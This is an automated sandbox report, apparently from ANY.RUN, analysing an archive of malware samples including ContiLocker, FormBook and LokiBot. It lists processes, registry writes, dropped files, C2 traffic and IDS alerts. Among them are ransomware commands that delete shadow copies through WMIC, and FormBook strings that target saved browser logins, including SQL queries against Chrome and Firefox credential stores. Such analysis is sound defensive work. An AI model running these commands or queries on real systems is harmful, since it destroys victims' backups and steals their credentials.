| File name: | The-Big-Malware-Repo-main.zip |
| Full analysis: | https://app.any.run/tasks/6659aa1f-2809-4480-8089-7ce21f0267b3 |
| Verdict: | Malicious activity |
| Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
| Analysis date: | February 28, 2024, 21:27:34 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v1.0 to extract, compression method=store |
| MD5: | 0200FA51CA5C0D039B5DBB5A972A39BB |
| SHA1: | 621F1FA52ED823AFF4CAEC959279E53FD966D083 |
| SHA256: | 766BE786FB4A1C6FD600DB396EC6DD3D73C4F347465E5EDD37BACAEFF1B2534A |
| SSDEEP: | 98304:s4T04g3fTnUSGfiqBaWBBTDNAM9pGr03GttEB4uX8cbSKi8ZUrJFIRRPAFLXkIl5:snGoKWHua |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 10 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | None |
| ZipModifyDate: | 2022:05:15 11:37:36 |
| ZipCRC: | 0x00000000 |
| ZipCompressedSize: | - |
| ZipUncompressedSize: | - |
| ZipFileName: | The-Big-Malware-Repo-main/ |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 124 | cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{554B8D6E-546B-4B8A-9D0C-21B3962C3BBF}'" delete | C:\Windows\System32\cmd.exe | — | ContiLocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 240 | C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{6F175CA9-28F7-437C-B115-2EC488FF7E61}'" delete | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 560 | cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{25D36354-3653-49FC-B6EA-5D1C27AE4CEF}'" delete | C:\Windows\System32\cmd.exe | — | ContiLocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 584 | "C:\Windows\System32\lsm.exe" | C:\Windows\System32\lsm.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Local Session Manager Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
Formbook(PID) Process(584) lsm.exe C2www.veterancg.com/eido/ Strings (84)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Mail\ \Foxmail \Storage\ \Accounts\Account.rec0 \Data\AccCfg\Accounts.tdat \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)revellbb.com tempranillowine.net viralstrategies.info blacktxu.com flfththirdbank.com vaoex.com theselfdirectedinvestor.com vinadelmar.travel othersidejimmythemonkey.com jaguar-landrovercenter-graz.com supremeosterreich.com chatsubs.com free99.design serviciosmvs.com bongmecams.xyz malikwoodson.com onlinegamebox.club 694624.com yeezyzapatos.club istanbul-hairtransplant.com expectations.info giveafeast.com latcsvg.com thetablelanta.com digitalcoastdaily.com talltailsentertainment.com gastore.store sextoys411.com hhty307.com gjiijsijfsdff.xyz discord-dnd.com myazpensioneducation.com housetraitors.com halopinkstar.com thethord.com brandx.biz mrgear.xyz emuk.site ydbaba.com wosongla.com paligeri.com clipcoffee.net pathnorthsweeps.com urlbnarc.com grimpeople.online surgetech.digital uppercase-shop.com anniebirdsong.info cherylalopes.com bravesxx.com buysalba.com aoneclubs.com wank152.com viv.gifts n1groupe.com zhengyp.top boreable.xyz pointlomaadvisors.com thebestineasttexas.com we-gamble.net snowycitron.online octsqd.xyz 226coaching.com phuclapgarment.com | |||||||||||||||
| 680 | cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{2BDBA874-FF68-40B9-8873-DED22C2C1972}'" delete | C:\Windows\System32\cmd.exe | — | ContiLocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 764 | C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CD816E64-954D-42BE-9185-4135B543186B}'" delete | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1092 | cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F2005F8-2675-4792-8D48-24D30D4C8680}'" delete | C:\Windows\System32\cmd.exe | — | ContiLocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1164 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1264 | cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{2FED360E-FD6E-4A70-8685-15C9ACDFC384}'" delete | C:\Windows\System32\cmd.exe | — | ContiLocker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1344 | C:\Windows\system32\vssvc.exe | C:\Windows\System32\VSSVC.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1164) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000DBDD10622BD67741A42163F361389C470000000002000000000010660000000100002000000053E9897FF30BD5955E9AA128F50AA0B29F09FB2B2A501303455F58430CF1C04F000000000E80000000020000200000000F147B139A99007CBC10653F2863E010E4D1ED11C2754DC3B41BC13D243BC2563000000025FF2DC3BE8BA533430C4255AB920AF07CED19AF4AA8DB7A9E5901AFEF141441D8AAB0D79CB6EF250B8A2A25AE58BF14400000000B3B30938D517334674FB6789A3A28EBFD2229942DFD83CA4512D2865AD059E54E1267CDFD42C6EE11C71D637DFB2E268C29F4D578678B556F2B4FF7F2D23D30 | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1164) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList |
| Operation: | write | Name: | MRUList |
Value: a | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main.zip | |||
| (PID) Process: | (3240) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\LokiBot Collection\0vbc.exe\vbc.exe.infected | executable | |
MD5:D2CE3B2A5F3EFB1FCEDE96304E57A531 | SHA256:E0A4948A58829F4ECD9E6FB9B28E127A6827BD8761DED085D2069A248F6F5462 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\README.md | text | |
MD5:4D89DB2F30450CB4EDA7652E2E0BD6E3 | SHA256:A166849076E8EE4E09440245B6E02EF3BC6C32CDFDFAE47DCDB0D8DF7F496521 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Trojan Collection\gjnvlcxv.exe\SQLite.Interop.dll.droppedx64 | executable | |
MD5:616827A61D7A49CE5389C5D96443E35D | SHA256:54D4025BC175DE5367D0ACE1A78FEC7EDF06B642892691CF85AFB02B8AB166D5 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Trojan Collection\README.md | text | |
MD5:9E85D4791D2E1D485C50ECDE15B96B3B | SHA256:65D64862D916A82D7600B82A568CDF7E0093BEBE59C8AB4EBAAB7933C81F6248 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Ransomware Collection\ContiLocker.exe.infected | executable | |
MD5:732A229132D455B98038E5A23432385D | SHA256:2FC6D7DF9252B1E2C4EB3AD7D0D29C188D87548127C44CEBC40DB9ABE8E5AA35 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Ransomware Collection\HITLER_RANSOMWARE.exe.infected | executable | |
MD5:0210D88F1A9C5A5A7EFF5C44CF4F7FBC | SHA256:06C8E0F6FA2616F4FA92C610A1FAEA23887AC31DB8FA78CEDE49B6B8C80EC22F | |||
| 3780 | vbc.exe | C:\Users\admin\AppData\Local\Temp\jurqlvqzsu80j5x5 | binary | |
MD5:D36BFA103F3793806490CC1E20CEB429 | SHA256:098B0F7A8E149F3F30525C7D956324BDEF23F43648AD136ED21B393F21E64F99 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Ransomware Collection\readme.md | text | |
MD5:20D97EC8E186E4BE88F7956518F060C1 | SHA256:105A6033F8467FCDEDE03A72F6F76D093DAC90461E9BC62ACE10DB93B81305F4 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Trojan Collection\gjnvlcxv.exe\README.md | text | |
MD5:A7DF0CE0CD7045D5DB4E20C2351A3BB3 | SHA256:99B9341C03D9173135C9F18409BF8D65047C8979BE18BA6A85C396A6F6C0BCC7 | |||
| 3240 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\The-Big-Malware-Repo-main\The-Big-Malware-Repo-main\Trojan Collection\see7.exe\see7.exe.infected | executable | |
MD5:1CCF28645E2D52556487A9710DE54D8E | SHA256:513624286483A4E172511B412B82445A06EEFC904D54DE75DA656EC1A6F8AE99 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4084 | cbgsujmwws.exe | POST | — | 45.133.1.20:80 | http://45.133.1.20/oluwa/five/fre.php | unknown | — | — | unknown |
1164 | explorer.exe | GET | — | 91.195.240.19:80 | http://www.chatsubs.com/eido/?Bv1=yWOEp2JlfPEfh7P2GVc/Mu/240sbimxW6RyCknZ1zm8o+a2py+lB/tvfrFUki7raXxjXbg==&tVpl=elNh56HxrD | unknown | — | — | unknown |
1164 | explorer.exe | GET | 200 | 199.59.242.150:80 | http://www.supremeosterreich.com/eido/?Bv1=UVvdjTvqdWxWkUdmGYxvb2NhdwqNw7bjBNt4LsePxc2kRq4rHi4cARCkiW63A4SDb0wc9Q==&tVpl=elNh56HxrD | unknown | html | 1.12 Kb | unknown |
1164 | explorer.exe | GET | — | 89.116.147.39:80 | http://www.paligeri.com/eido/?Bv1=pzKSBAoHFsHdOPacSF0/YeXnMTUgmN/ci9ANCr90AqAf/FULgVFwm8yhj/iDYh+IWV7J8A==&tVpl=elNh56HxrD | unknown | — | — | unknown |
1164 | explorer.exe | GET | — | 188.114.97.3:80 | http://www.sextoys411.com/eido/?Bv1=1HbDhBreyArZY/H5YQUXFqv3MLXx5a6ii9/s8t8sreuK50crFRD4VOuQszDJZy6dlzqLqA==&tVpl=elNh56HxrD | unknown | — | — | unknown |
3540 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | unknown |
1164 | explorer.exe | GET | — | 91.195.240.94:80 | http://www.istanbul-hairtransplant.com/eido/?Bv1=A9zOL0rhhXZkNZeb4knCR5+Zw+VdrXkN6sLjbmoUhHBzBvRTnt0WKGzaKEEpaGQrQx41ug==&tVpl=elNh56HxrD | unknown | — | — | unknown |
3540 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3540 | gjnvlcxv.exe | 195.201.57.90:443 | ipwhois.app | Hetzner Online GmbH | DE | unknown |
4084 | cbgsujmwws.exe | 45.133.1.20:80 | — | — | NL | unknown |
1164 | explorer.exe | 91.195.240.19:80 | www.chatsubs.com | SEDO GmbH | DE | unknown |
1164 | explorer.exe | 199.59.242.150:80 | www.supremeosterreich.com | BODIS-1 | US | unknown |
1164 | explorer.exe | 89.116.147.39:80 | www.paligeri.com | Megaservers.de | LT | unknown |
— | — | 192.168.100.4:49212 | — | — | — | unknown |
— | — | 192.168.100.4:49213 | — | — | — | unknown |
Domain | IP | Reputation |
|---|---|---|
ipwhois.app |
| unknown |
www.chatsubs.com |
| unknown |
www.supremeosterreich.com |
| unknown |
www.paligeri.com |
| unknown |
www.thethord.com |
| unknown |
www.halopinkstar.com |
| unknown |
www.694624.com |
| unknown |
www.sextoys411.com |
| unknown |
www.hhty307.com |
| unknown |
www.istanbul-hairtransplant.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1164 | explorer.exe | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
1164 | explorer.exe | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
3688 | ContiLocker.exe | Misc activity | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |
4 | System | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an SMB server inside a home network |